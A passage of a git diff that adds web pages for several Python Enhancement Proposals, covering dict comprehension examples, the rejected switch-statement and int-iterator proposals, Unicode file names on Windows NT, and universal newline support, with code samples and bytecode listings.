The dictionary constructor approach has two distinct disadvantages +from the proposed syntax though. First, it isn’t as legible as a +dict comprehension. Second, it forces the programmer to create an +in-core list object first, which could be expensive.

+
+
+

Examples

+
>>> print {i : chr(65+i) for i in range(4)}
+{0 : 'A', 1 : 'B', 2 : 'C', 3 : 'D'}
+
+
+
>>> print {k : v for k, v in someDict.iteritems()} == someDict.copy()
+1
+
+
+
>>> print {x.lower() : 1 for x in list_of_email_addrs}
+{'barry@zope.com'   : 1, 'barry@python.org' : 1, 'guido@python.org' : 1}
+
+
+
>>> def invert(d):
+...     return {v : k for k, v in d.iteritems()}
+...
+>>> d = {0 : 'A', 1 : 'B', 2 : 'C', 3 : 'D'}
+>>> print invert(d)
+{'A' : 0, 'B' : 1, 'C' : 2, 'D' : 3}
+
+
+
>>> {(k, v): k+v for k in range(4) for v in range(4)}
+{(3, 3): 6, (3, 2): 5, (3, 1): 4, (0, 1): 1, (2, 1): 3,
+ (0, 2): 2, (3, 0): 3, (0, 3): 3, (1, 1): 2, (1, 0): 1,
+ (0, 0): 0, (1, 2): 3, (2, 0): 2, (1, 3): 4, (2, 2): 4,
+ (2, 3): 5}
+
+
+
+
+

Implementation

+

All implementation details were resolved in the Python 2.7 and 3.0 +time-frame.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0274.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0275/index.html new file mode 100644 index 00000000000..1575d4c6fad --- /dev/null +++ b/pep-0275/index.html @@ -0,0 +1,481 @@ + + PEP 275 – Switching on Multiple Values | peps.python.org + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 275 – Switching on Multiple Values

+
+
Author:
+
Marc-André Lemburg <mal at lemburg.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
10-Nov-2001
+
Python-Version:
+
2.6
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

A similar PEP for Python 3000, PEP 3103, was already rejected, +so this proposal has no chance of being accepted either.

+
+
+

Abstract

+

This PEP proposes strategies to enhance Python’s performance +with respect to handling switching on a single variable having +one of multiple possible values.

+
+
+

Problem

+

Up to Python 2.5, the typical way of writing multi-value switches +has been to use long switch constructs of the following type:

+
if x == 'first state':
+    ...
+elif x == 'second state':
+    ...
+elif x == 'third state':
+    ...
+elif x == 'fourth state':
+    ...
+else:
+    # default handling
+    ...
+
+
+

This works fine for short switch constructs, since the overhead of +repeated loading of a local (the variable x in this case) and +comparing it to some constant is low (it has a complexity of O(n) +on average). However, when using such a construct to write a state +machine such as is needed for writing parsers the number of +possible states can easily reach 10 or more cases.

+

The current solution to this problem lies in using a dispatch +table to find the case implementing method to execute depending on +the value of the switch variable (this can be tuned to have a +complexity of O(1) on average, e.g. by using perfect hash +tables). This works well for state machines which require complex +and lengthy processing in the different case methods. It does not +perform well for ones which only process one or two instructions +per case, e.g.

+
def handle_data(self, data):
+    self.stack.append(data)
+
+
+

A nice example of this is the state machine implemented in +pickle.py which is used to serialize Python objects. Other +prominent cases include XML SAX parsers and Internet protocol +handlers.
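For illustration, a minimal sketch of the dispatch-table pattern described above; the class and handler names are invented for this example and are not taken from pickle.py:

class Machine:
    # Handlers that do very little work per case: the per-call cost of
    # the dict lookup and the method call dominates, as noted above.
    def handle_data(self, data):
        self.stack.append(data)

    def handle_mark(self, data):
        self.marks.append(len(self.stack))

    # O(1) average-time dispatch table mapping state names to handlers.
    dispatch = {'data': handle_data, 'mark': handle_mark}

    def __init__(self):
        self.stack, self.marks = [], []

    def feed(self, state, data):
        self.dispatch[state](self, data)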

+
+
+

Proposed Solutions

+

This PEP proposes two different but not necessarily conflicting +solutions:

+
+
  1. Adding an optimization to the Python compiler and VM which detects the above if-elif-else construct and generates special opcodes for it which use a read-only dictionary for storing jump offsets.
  2. Adding new syntax to Python which mimics the C style switch statement.
+

The first solution has the benefit of not relying on adding new +keywords to the language, while the second looks cleaner. Both +involve some run-time overhead to assure that the switching +variable is immutable and hashable.

+

Both solutions use a dictionary lookup to find the right jump location, so they both share the same problem space in terms of requiring that both the switch variable and the constants be compatible with the dictionary implementation (hashable, comparable, a==b => hash(a)==hash(b)).

+
+

Solution 1: Optimizing if-elif-else

+

Implementation:

+

It should be possible for the compiler to detect an +if-elif-else construct which has the following signature:

+
if x == 'first':...
+elif x == 'second':...
+else:...
+
+
+

i.e. the left hand side always references the same variable, +the right hand side a hashable immutable builtin type. The +right hand sides need not be all of the same type, but they +should be comparable to the type of the left hand switch +variable.

+

The compiler could then set up a read-only (perfect) hash table, store it in the constants and add an opcode SWITCH in front of the standard if-elif-else byte code stream which triggers the following run-time behaviour:

+

At runtime, SWITCH would check x for being one of the +well-known immutable types (strings, unicode, numbers) and +use the hash table for finding the right opcode snippet. If +this condition is not met, the interpreter should revert to +the standard if-elif-else processing by simply skipping the +SWITCH opcode and proceeding with the usual if-elif-else byte +code stream.
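The following is a rough Python-level sketch of those semantics (the actual proposal operates at the bytecode level; jump_table stands in for the read-only dictionary of jump offsets, and all names here are illustrative only):

def switch_dispatch(x, jump_table, cases, default):
    if isinstance(x, (int, float, str)):        # one of the well-known immutable types
        return jump_table.get(x, default)()     # O(1) hash lookup, like the SWITCH opcode
    # Condition not met: fall back to ordinary if-elif-else processing.
    for constant, handler in cases:
        if x == constant:
            return handler()
    return default()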

+

Issues:

+

The new optimization should not change the current Python +semantics (by reducing the number of __cmp__ calls and adding +__hash__ calls in if-elif-else constructs which are affected +by the optimization). To assure this, switching can only +safely be implemented either if a “from __future__” style +flag is used, or the switching variable is one of the builtin +immutable types: int, float, string, unicode, etc. (not +subtypes, since it’s not clear whether these are still +immutable or not)

+

To prevent post-modifications of the jump-table dictionary +(which could be used to reach protected code), the jump-table +will have to be a read-only type (e.g. a read-only +dictionary).

+

The optimization should only be used for if-elif-else +constructs which have a minimum number of n cases (where n is +a number which has yet to be defined depending on performance +tests).

+
+
+

Solution 2: Adding a switch statement to Python

+
+

New Syntax

+
switch EXPR:
+    case CONSTANT:
+        SUITE
+    case CONSTANT:
+        SUITE
+    ...
+    else:
+        SUITE
+
+
+

(modulo indentation variations)

+

The “else” part is optional. If no else part is given and +none of the defined cases matches, no action is taken and +the switch statement is ignored. This is in line with the +current if-behaviour. A user who wants to signal this +situation using an exception can define an else-branch +which then implements the intended action.

+

Note that the constants need not be all of the same type, but +they should be comparable to the type of the switch variable.

+
+
+

Implementation

+

The compiler would have to compile this into byte code +similar to this:

+
def whatis(x):
+    switch(x):
+        case 'one':
+            print '1'
+        case 'two':
+            print '2'
+        case 'three':
+            print '3'
+        else:
+            print "D'oh!"
+
+
+

into (omitting POP_TOP’s and SET_LINENO’s):

+
   6  LOAD_FAST         0 (x)
+   9  LOAD_CONST        1 (switch-table-1)
+  12  SWITCH            26 (to 38)
+
+  14  LOAD_CONST        2 ('1')
+  17  PRINT_ITEM
+  18  PRINT_NEWLINE
+  19  JUMP 43
+
+  22  LOAD_CONST        3 ('2')
+  25  PRINT_ITEM
+  26  PRINT_NEWLINE
+  27  JUMP 43
+
+  30  LOAD_CONST        4 ('3')
+  33  PRINT_ITEM
+  34  PRINT_NEWLINE
+  35  JUMP 43
+
+  38  LOAD_CONST        5 ("D'oh!")
+  41  PRINT_ITEM
+  42  PRINT_NEWLINE
+
+>>43  LOAD_CONST        0 (None)
+  46  RETURN_VALUE
+
+
+

Where the ‘SWITCH’ opcode would jump to 14, 22, 30 or 38 +depending on ‘x’.

+

Thomas Wouters has written a patch which demonstrates the +above. You can download it from [1].

+
+
+

Issues

+

The switch statement should not implement fall-through +behaviour (as does the switch statement in C). Each case +defines a complete and independent suite; much like in an +if-elif-else statement. This also enables using break in +switch statements inside loops.

+

If the interpreter finds that the switch variable x is +not hashable, it should raise a TypeError at run-time +pointing out the problem.

+

There have been other proposals for the syntax which reuse +existing keywords and avoid adding two new ones (“switch” and +“case”). Others have argued that the keywords should use new +terms to avoid confusion with the C keywords of the same name +but slightly different semantics (e.g. fall-through without +break). Some of the proposed variants:

+
case EXPR:
+    of CONSTANT:
+        SUITE
+    of CONSTANT:
+        SUITE
+    else:
+        SUITE
+
+case EXPR:
+    if CONSTANT:
+         SUITE
+    if CONSTANT:
+        SUITE
+    else:
+        SUITE
+
+when EXPR:
+    in CONSTANT_TUPLE:
+        SUITE
+    in CONSTANT_TUPLE:
+        SUITE
+    ...
+else:
+     SUITE
+
+
+

The switch statement could be extended to allow multiple values for one section (e.g. case ‘a’, ‘b’, ‘c’: …). Another proposed extension would allow ranges of values (e.g. case 10..14: …). These should probably be postponed, but already kept in mind when designing and implementing a first version. A dispatch-based approximation of the multiple-values form is sketched below.
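This sketch uses a plain dictionary in current Python; the case decorator and handler names are invented for illustration:

handlers = {}

def case(*constants):
    # Register one handler under several constants, approximating
    # "case 'a', 'b', 'c':" and the proposed range form "case 10..14:".
    def register(func):
        for constant in constants:
            handlers[constant] = func
        return func
    return register

@case('a', 'b', 'c')
def letters(x):
    return 'letter'

@case(*range(10, 15))    # stands in for "case 10..14:"
def teens(x):
    return 'in 10..14'

assert handlers['b']('b') == 'letter' and handlers[12](12) == 'in 10..14'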

+
+
+
+

Examples

+

The following examples all use a new syntax as proposed by +solution 2. However, all of these examples would work with +solution 1 as well.

+
switch EXPR:                   switch x:
+    case CONSTANT:                 case "first":
+        SUITE                          print x
+    case CONSTANT:                 case "second":
+        SUITE                          x = x**2
+    ...                                print x
+    else:                          else:
+        SUITE                          print "whoops!"
+
+
+case EXPR:                     case x:
+    of CONSTANT:                   of "first":
+        SUITE                          print x
+    of CONSTANT:                   of "second":
+        SUITE                          print x**2
+    else:                          else:
+        SUITE                          print "whoops!"
+
+
+case EXPR:                     case state:
+    if CONSTANT:                   if "first":
+         SUITE                         state = "second"
+    if CONSTANT:                   if "second":
+        SUITE                          state = "third"
+    else:                          else:
+        SUITE                          state = "first"
+
+
+when EXPR:                     when state:
+    in CONSTANT_TUPLE:             in ("first", "second"):
+        SUITE                          print state
+    in CONSTANT_TUPLE:                 state = next_state(state)
+        SUITE                      in ("seventh",):
+    ...                                print "done"
+else:                                  break    # out of loop!
+     SUITE                     else:
+                                   print "middle state"
+                                   state = next_state(state)
+
+
+

Here’s another nice application found by Jack Jansen (switching +on argument types):

+
switch type(x).__name__:
+    case 'int':
+        SUITE
+    case 'string':
+        SUITE
+
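A runnable dictionary-based equivalent of this type switch, for illustration (the handler bodies stand in for the SUITEs; note that type('x').__name__ is actually 'str', not 'string'):

def describe(x):
    handlers = {
        'int': lambda v: 'an int: %d' % v,
        'str': lambda v: 'a string: %r' % v,
    }
    handler = handlers.get(type(x).__name__)
    return handler(x) if handler is not None else 'unhandled type'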
+
+
+
+
+

Scope

+

XXX Explain “from __future__ import switch”

+
+
+

Credits

+
    +
  • Martin von Löwis (issues with the optimization idea)
  • +
  • Thomas Wouters (switch statement + byte code compiler example)
  • +
  • Skip Montanaro (dispatching ideas, examples)
  • +
  • Donald Beaudry (switch syntax)
  • +
  • Greg Ewing (switch syntax)
  • +
  • Jack Jansen (type switching examples)
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0275.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0276/index.html b/pep-0276/index.html new file mode 100644 index 00000000000..339242f1d2e --- /dev/null +++ b/pep-0276/index.html @@ -0,0 +1,481 @@ + PEP 276 – Simple Iterator for ints | peps.python.org +
+
+


+ + +
+
+
+

PEP 276 – Simple Iterator for ints

+
+
Author:
+
Jim Althoff <james_althoff at i2.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
12-Nov-2001
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

Python 2.1 added new functionality to support iterators (PEP 234). +Iterators have proven to be useful and convenient in many coding +situations. It is noted that the implementation of Python’s +for-loop control structure uses the iterator protocol as of +release 2.1. It is also noted that Python provides iterators for +the following builtin types: lists, tuples, dictionaries, strings, +and files. This PEP proposes the addition of an iterator for the +builtin type int (types.IntType). Such an iterator would simplify +the coding of certain for-loops in Python.

+
+
+

BDFL Pronouncement

+

This PEP was rejected on 17 June 2005 with a note to python-dev.

+

Much of the original need was met by the enumerate() function which +was accepted for Python 2.3.

+

Also, the proposal both allowed and encouraged misuses such as:

+
>>> for i in 3: print i
+0
+1
+2
+
+
+

Likewise, it was not helpful that the proposal would disable the error (currently a TypeError) in statements like:

+
x, = 1
+
+
+
+
+

Specification

+

Define an iterator for types.IntType (i.e., the builtin type “int”) that is returned from the builtin function “iter” when called with an instance of types.IntType as the argument.

+

The returned iterator has the following behavior:

+
+
  • Assume that object i is an instance of types.IntType (the builtin type int) and that i > 0
  • iter(i) returns an iterator object
  • said iterator object iterates through the sequence of ints 0,1,2,…,i-1

    Example: iter(5) returns an iterator object that iterates through the sequence of ints 0,1,2,3,4

  • if i <= 0, iter(i) returns an “empty” iterator, i.e., one that throws StopIteration upon the first call of its “next” method
+

In other words, the conditions and semantics of said iterator are consistent with the conditions and semantics of the range() and xrange() functions.

+

Note that the sequence 0,1,2,…,i-1 associated with the int i is +considered “natural” in the context of Python programming because +it is consistent with the builtin indexing protocol of sequences +in Python. Python lists and tuples, for example, are indexed +starting at 0 and ending at len(object)-1 (when using positive +indices). In other words, such objects are indexed with the +sequence 0,1,2,…,len(object)-1
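As a sketch of the proposed semantics, here is an int subclass with an __iter__ method, along the lines of the prototype the author mentions under Implementation below (IterInt is an invented name):

class IterInt(int):
    def __iter__(self):
        # Iterate through 0, 1, ..., self-1; empty for self <= 0,
        # matching range()/xrange() semantics.
        return iter(range(self))

assert list(IterInt(5)) == [0, 1, 2, 3, 4]
assert list(IterInt(-2)) == []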

+
+
+

Rationale

+

A common programming idiom is to take a collection of objects and +apply some operation to each item in the collection in some +established sequential order. Python provides the “for in” +looping control structure for handling this common idiom. Cases +arise, however, where it is necessary (or more convenient) to +access each item in an “indexed” collection by iterating through +each index and accessing each item in the collection using the +corresponding index.

+

For example, one might have a two-dimensional “table” object where one +requires the application of some operation to the first column of +each row in the table. Depending on the implementation of the table +it might not be possible to access first each row and then each +column as individual objects. It might, rather, be possible to +access a cell in the table using a row index and a column index. +In such a case it is necessary to use an idiom where one iterates +through a sequence of indices (indexes) in order to access the +desired items in the table. (Note that the commonly used +DefaultTableModel class in Java-Swing-Jython has this very protocol).

+

Another common example is where one needs to process two or more +collections in parallel. Another example is where one needs to +access, say, every second item in a collection.

+

There are many other examples where access to items in a +collection is facilitated by a computation on an index thus +necessitating access to the indices rather than direct access to +the items themselves.

+

Let’s call this idiom the “indexed for-loop” idiom. Some +programming languages provide builtin syntax for handling this +idiom. In Python the common convention for implementing the +indexed for-loop idiom is to use the builtin range() or xrange() +function to generate a sequence of indices as in, for example:

+
for rowcount in range(table.getRowCount()):
+    print table.getValueAt(rowcount, 0)
+
+
+

or

+
for rowcount in xrange(table.getRowCount()):
+    print table.getValueAt(rowcount, 0)
+
+
+

From time to time there are discussions in the Python community +about the indexed for-loop idiom. It is sometimes argued that the +need for using the range() or xrange() function for this design +idiom is:

+
    +
  • Not obvious (to new-to-Python programmers),
  • +
  • Error prone (easy to forget, even for experienced Python +programmers)
  • +
  • Confusing and distracting for those who feel compelled to understand +the differences and recommended usage of xrange() vis-a-vis range()
  • +
  • Unwieldy, especially when combined with the len() function, +i.e., xrange(len(sequence))
  • +
  • Not as convenient as equivalent mechanisms in other languages,
  • +
  • Annoying, a “wart”, etc.
  • +
+

And from time to time proposals are put forth for ways in which +Python could provide a better mechanism for this idiom. Recent +examples include PEP 204, “Range Literals”, and PEP 212, “Loop +Counter Iteration”.

+

Most often, such proposals include changes to Python’s syntax and other “heavyweight” changes.

+

Part of the difficulty here is that advocating new syntax implies +a comprehensive solution for “general indexing” that has to +include aspects like:

+
    +
  • starting index value
  • +
  • ending index value
  • +
  • step value
  • +
  • open intervals versus closed intervals versus half opened intervals
  • +
+

Finding a new syntax that is comprehensive, simple, general, +Pythonic, appealing to many, easy to implement, not in conflict +with existing structures, not excessively overloading of existing +structures, etc. has proven to be more difficult than one might +anticipate.

+

The proposal outlined in this PEP tries to address the problem by +suggesting a simple “lightweight” solution that helps the most +common case by using a proven mechanism that is already available +(as of Python 2.1): namely, iterators.

+

Because for-loops already use “iterator” protocol as of Python +2.1, adding an iterator for types.IntType as proposed in this PEP +would enable by default the following shortcut for the indexed +for-loop idiom:

+
for rowcount in table.getRowCount():
+    print table.getValueAt(rowcount, 0)
+
+
+

The following benefits are claimed for this approach vis-a-vis the current mechanism of using the range() or xrange() functions:

+
    +
  • Simpler,
  • +
  • Less cluttered,
  • +
  • Focuses on the problem at hand without the need to resort to +secondary implementation-oriented functions (range() and +xrange())
  • +
+

And compared to other proposals for change:

+
    +
  • Requires no new syntax
  • +
  • Requires no new keywords
  • +
  • Takes advantage of the new and well-established iterator mechanism
  • +
+

And generally:

+
    +
  • Is consistent with iterator-based “convenience” changes already +included (as of Python 2.1) for other builtin types such as: +lists, tuples, dictionaries, strings, and files.
  • +
+
+
+

Backwards Compatibility

+

The proposed mechanism is generally backwards compatible as it +calls for neither new syntax nor new keywords. All existing, +valid Python programs should continue to work unmodified.

+

However, this proposal is not perfectly backwards compatible in +the sense that certain statements that are currently invalid +would, under the current proposal, become valid.

+

Tim Peters has pointed out two such examples:

+
    +
  1. The common case where one forgets to include range() or +xrange(), for example:
    for rowcount in table.getRowCount():
    +    print table.getValueAt(rowcount, 0)
    +
    +
    +

    in Python 2.2 raises a TypeError exception.

    +

    Under the current proposal, the above statement would be valid +and would work as (presumably) intended. Presumably, this is a +good thing.

    +

    As noted by Tim, this is the common case of the “forgotten +range” mistake (which one currently corrects by adding a call +to range() or xrange()).

    +
  2. The (hopefully) very uncommon case where one makes a typing mistake when using tuple unpacking. For example:
    x, = 1
    +
    +
    +

    in Python 2.2 raises a TypeError exception.

    +

    Under the current proposal, the above statement would be valid +and would set x to 0. The PEP author has no data as to how +common this typing error is nor how difficult it would be to +catch such an error under the current proposal. He imagines +that it does not occur frequently and that it would be +relatively easy to correct should it happen.

    +
+
+
+

Issues

+

Extensive discussions concerning PEP 276 on the Python interest +mailing list suggests a range of opinions: some in favor, some +neutral, some against. Those in favor tend to agree with the +claims above of the usefulness, convenience, ease of learning, +and simplicity of a simple iterator for integers.

+

Issues with PEP 276 include:

+
    +
  • Using range/xrange is fine as is.

Response: Some posters feel this way. Others disagree.

    +
  • +
Some feel that iterating over the sequence “0, 1, 2, …, n-1” for an integer n is not intuitive. “for i in 5:” is considered (by some) to be “non-obvious”, for example. Some dislike this usage because it doesn’t have “the right feel”. Some dislike it because they believe that this type of usage forces one to view integers as sequences and this seems wrong to them. Some dislike it because they prefer to view for-loops as dealing with explicit sequences rather than with arbitrary iterators.

    Response: Some like the proposed idiom and see it as simple, +elegant, easy to learn, and easy to use. Some are neutral on +this issue. Others, as noted, dislike it.

    +
  • +
  • Is it obvious that iter(5) maps to the sequence 0,1,2,3,4?

    Response: Given, as noted above, that Python has a strong +convention for indexing sequences starting at 0 and stopping at +(inclusively) the index whose value is one less than the length +of the sequence, it is argued that the proposed sequence is +reasonably intuitive to the Python programmer while being useful +and practical. More importantly, it is argued that once learned +this convention is very easy to remember. Note that the doc +string for the range function makes a reference to the +natural and useful association between range(n) and the indices +for a list whose length is n.

    +
  • +
  • Possible ambiguity
    for i in 10: print i
    +
    +
    +

    might be mistaken for

    +
    for i in (10,): print i
    +
    +
    +

    Response: This is exactly the same situation with strings in +current Python (replace 10 with ‘spam’ in the above, for +example).

    +
  • +
Too general: in the newest releases of Python there are contexts – as with for-loops – where iterators are invoked implicitly. Some fear that having an iterator invoked for an integer in one of these contexts (excluding for-loops) might lead to unexpected behavior and bugs. The “x, = 1” example noted above is a case in point.

    Response: From the author’s perspective the examples of the +above that were identified in the PEP 276 discussions did +not appear to be ones that would be accidentally misused +in ways that would lead to subtle and hard-to-detect errors.

    +

    In addition, it seems that there is a way to deal with this +issue by using a variation of what is outlined in the +specification section of this proposal. Instead of adding +an __iter__ method to class int, change the for-loop handling +code to convert (in essence) from

    +
    for i in n:  # when isinstance(n,int) is 1
    +
    +
    +

    to

    +
    for i in xrange(n):
    +
    +
    +

    This approach gives the same results in a for-loop as an +__iter__ method would but would prevent iteration on integer +values in any other context. Lists and tuples, for example, +don’t have __iter__ and are handled with special code. +Integer values would be one more special case.

    +
  • +
  • “i in n” seems very unnatural.

    Response: Some feel that “i in len(mylist)” would be easily +understandable and useful. Some don’t like it, particularly +when a literal is used as in “i in 5”. If the variant +mentioned in the response to the previous issue is implemented, +this issue is moot. If not, then one could also address this +issue by defining a __contains__ method in class int that would +always raise a TypeError. This would then make the behavior of +“i in n” identical to that of current Python.

    +
  • +
  • Might dissuade newbies from using the indexed for-loop idiom when +the standard “for item in collection:” idiom is clearly better.

    Response: The standard idiom is so nice when it fits that it +needs neither extra “carrot” nor “stick”. On the other hand, +one does notice cases of overuse/misuse of the standard idiom +(due, most likely, to the awkwardness of the indexed for-loop +idiom), as in:

    +
    for item in sequence:
    +    print sequence.index(item)
    +
    +
    +
  • +
  • Why not propose even bigger changes?
  • +
+

The majority of disagreement with PEP 276 came from those who +favor much larger changes to Python to address the more general +problem of specifying a sequence of integers where such +a specification is general enough to handle the starting value, +ending value, and stepping value of the sequence and also +addresses variations of open, closed, and half-open (half-closed) +integer intervals. Many suggestions of such were discussed.

+

These include:

+
    +
  • adding Haskell-like notation for specifying a sequence of +integers in a literal list,
  • +
  • various uses of slicing notation to specify sequences,
  • +
  • changes to the syntax of for-in loops to allow the use of +relational operators in the loop header,
  • +
  • creation of an integer-interval class along with methods that +overload relational operators or division operators +to provide “slicing” on integer-interval objects,
  • +
  • and more.
  • +
+

It should be noted that there was much debate but not an +overwhelming consensus for any of these larger-scale suggestions.

+

Clearly, PEP 276 does not propose such a large-scale change +and instead focuses on a specific problem area. Towards the +end of the discussion period, several posters expressed favor +for the narrow focus and simplicity of PEP 276 vis-a-vis the more +ambitious suggestions that were advanced. There did appear to be +consensus for the need for a PEP for any such larger-scale, +alternative suggestion. In light of this recognition, details of +the various alternative suggestions are not discussed here further.

+
+
+

Implementation

+

An implementation is not available at this time but is expected +to be straightforward. The author has implemented a subclass of +int with an __iter__ method (written in Python) as a means to test +out the ideas in this proposal, however.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0276.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0277/index.html b/pep-0277/index.html new file mode 100644 index 00000000000..d11cedb3513 --- /dev/null +++ b/pep-0277/index.html @@ -0,0 +1,225 @@ + PEP 277 – Unicode file name support for Windows NT | peps.python.org +
+
+


+ + +
+
+
+

PEP 277 – Unicode file name support for Windows NT

+
+
Author:
+
Neil Hodgson <neilh at scintilla.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-Jan-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP discusses supporting access to all files possible on +Windows NT by passing Unicode file names directly to the system’s +wide-character functions.

+
+
+

Rationale

+

Python 2.2 on Win32 platforms converts Unicode file names passed to open and to functions in the os module into the ‘mbcs’ encoding before passing the result to the operating system. This is often successful in the common case where the script is operating with the locale set to the same value as when the file was created. Most machines are set up with one locale and are rarely if ever changed from it. For some users the locale is changed more often, and on servers there are often files saved by users using different locales.

+

On Windows NT and descendent operating systems, including Windows +2000 and Windows XP, wide-character APIs are available that +provide direct access to all file names, including those that are +not representable using the current locale. The purpose of this +proposal is to provide access to these wide-character APIs through +the standard Python file object and posix module and so provide +access to all files on Windows NT.

+
+
+

Specification

+

On Windows platforms which provide wide-character file APIs, when +Unicode arguments are provided to file APIs, wide-character calls +are made instead of the standard C library and posix calls.

+

The Python file object is extended to use a Unicode file name +argument directly rather than converting it. This affects the +file object constructor file(filename[, mode[, bufsize]]) and also +the open function which is an alias of this constructor. When a +Unicode filename argument is used here then the name attribute of +the file object will be Unicode. The representation of a file +object, repr(f) will display Unicode file names as an escaped +string in a similar manner to the representation of Unicode +strings.

+

The posix module contains functions that take file or directory names: chdir, listdir, mkdir, open, remove, rename, rmdir, stat, and _getfullpathname. These will use Unicode arguments directly rather than converting them. For the rename function, this behaviour is triggered when either of the arguments is Unicode, with the other argument converted to Unicode using the default encoding.

+

The listdir function currently returns a list of strings. Under +this proposal, it will return a list of Unicode strings when its +path argument is Unicode.
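A small sketch of the specified behaviour, in the Python 2 terms of this PEP:

import os

# names = os.listdir(u'.')   # unicode argument: unicode names returned (Py2 on NT)
# names = os.listdir('.')    # byte-string argument: byte-string names returned
#
# In modern Python 3 the distinction has disappeared: str is Unicode and
# the wide-character Windows APIs are used unconditionally.
names = os.listdir('.')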

+
+
+

Restrictions

+

On the consumer Windows operating systems, Windows 95, Windows 98, and Windows ME, there are no wide-character file APIs, so behaviour is unchanged under this proposal. It may be possible in the future to extend this proposal to cover these operating systems, as the VFAT-32 file system used by them does support Unicode file names, but access is difficult and implementing this would require much work. The “Microsoft Layer for Unicode” could be a starting point for implementing this.

+

Python can be compiled with the size of Unicode characters set to +4 bytes rather than 2 by defining PY_UNICODE_TYPE to be a 4 byte +type and Py_UNICODE_SIZE to be 4. As the Windows API does not +accept 4 byte characters, the features described in this proposal +will not work in this mode so the implementation falls back to the +current ‘mbcs’ encoding technique. This restriction could be lifted +in the future by performing extra conversions using +PyUnicode_AsWideChar but for now that would add too much +complexity for a very rarely used feature.

+
+
+

Reference Implementation

+

The implementation is available at [2].

+
+
+

References

+

[1] Microsoft Windows APIs + https://msdn.microsoft.com/

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0277.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0278/index.html b/pep-0278/index.html new file mode 100644 index 00000000000..1738c5382c2 --- /dev/null +++ b/pep-0278/index.html @@ -0,0 +1,297 @@ + PEP 278 – Universal Newline Support | peps.python.org +
+
+


+ + +
+
+
+

PEP 278 – Universal Newline Support

+
+
Author:
+
Jack Jansen <jack at cwi.nl>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
14-Jan-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
+
+

Abstract

+

This PEP discusses a way in which Python can support I/O on files +which have a newline format that is not the native format on the +platform, so that Python on each platform can read and import +files with CR (Macintosh), LF (Unix) or CR LF (Windows) line +endings.

+

It is more and more common to come across files that have an end +of line that does not match the standard on the current platform: +files downloaded over the net, remotely mounted filesystems on a +different platform, Mac OS X with its double standard of Mac and +Unix line endings, etc.

+

Many tools such as editors and compilers already handle this gracefully; it would be good if Python did so too.

+
+
+

Specification

+

Universal newline support is enabled by default, +but can be disabled during the configure of Python.

+

In a Python with universal newline support the feature is +automatically enabled for all import statements and execfile() +calls. There is no special support for eval() or exec.

+

In a Python with universal newline support open() the mode +parameter can also be “U”, meaning “open for input as a text file +with universal newline interpretation”. Mode “rU” is also allowed, +for symmetry with “rb”. Mode “U” cannot be +combined with other mode flags such as “+”. Any line ending in the +input file will be seen as a '\n' in Python, so little other code has +to change to handle universal newlines.

+

Conversion of newlines happens in all calls that read data: read(), +readline(), readlines(), etc.

+

There is no special support for output to file with a different +newline convention, and so mode “wU” is also illegal.

+

A file object that has been opened in universal newline mode gets +a new attribute “newlines” which reflects the newline convention +used in the file. The value for this attribute is one of None (no +newline read yet), "\r", "\n", "\r\n" or a tuple containing all the +newline types seen.
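A short sketch of this behaviour; mode “U” itself is from this era (universal newlines later became the default for text mode), but the newlines attribute still exists on text files in modern Python:

with open('mixed.txt', 'wb') as f:
    f.write(b'one\rtwo\nthree\r\n')      # Mac, Unix and Windows endings

with open('mixed.txt') as f:             # text mode: universal newline input
    assert f.read() == 'one\ntwo\nthree\n'
    print(f.newlines)                    # e.g. ('\r', '\n', '\r\n')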

+
+
+

Rationale

+

Universal newline support is implemented in C, not in Python. +This is done because we want files with a foreign newline +convention to be import-able, so a Python Lib directory can be +shared over a remote file system connection, or between MacPython +and Unix-Python on Mac OS X. For this to be feasible the +universal newline convention needs to have a reasonably small +impact on performance, which means a Python implementation is not +an option as it would bog down all imports. And because of files +with multiple newline conventions, which Visual C++ and other +Windows tools will happily produce, doing a quick check for the +newlines used in a file (handing off the import to C code if a +platform-local newline is seen) will not work. Finally, a C +implementation also allows tracebacks and such (which open the +Python source module) to be handled easily.

+

There is no output implementation of universal newlines; Python programs are expected to handle this by themselves, or otherwise write files using the platform-local convention. The reason for this is that input is the difficult case; outputting different newlines to a file is already easy enough in Python.

+

Also, an output implementation would be much more difficult than an +input implementation, surprisingly: a lot of output is done through +PyXXX_Print() methods, and at this point the file object is not +available anymore, only a FILE *. So, an output implementation would +need to somehow go from the FILE* to the file object, because that +is where the current newline delimiter is stored.

+

The input implementation has no such problem: there are no cases in +the Python source tree where files are partially read from C, +partially from Python, and such cases are expected to be rare in +extension modules. If such cases exist the only problem is that the +newlines attribute of the file object is not updated during the +fread() or fgets() calls that are done direct from C.

+

A partial output implementation, where strings passed to fp.write() would be converted to use fp.newlines as their line terminator while all other output would not be, is far too surprising, in my view.

+

Because there is no output support for universal newlines there is +also no support for a mode “rU+”: the surprise factor of the +previous paragraph would hold to an even stronger degree.

+

There is no support for universal newlines in strings passed to +eval() or exec. It is envisioned that such strings always have the +standard \n line feed, if the strings come from a file that file can +be read with universal newlines.

+

I think there are no special issues with unicode. utf-16 shouldn’t +pose any new problems, as such files need to be opened in binary +mode anyway. Interaction with utf-8 is fine too: values 0x0a and 0x0d +cannot occur as part of a multibyte sequence.

+

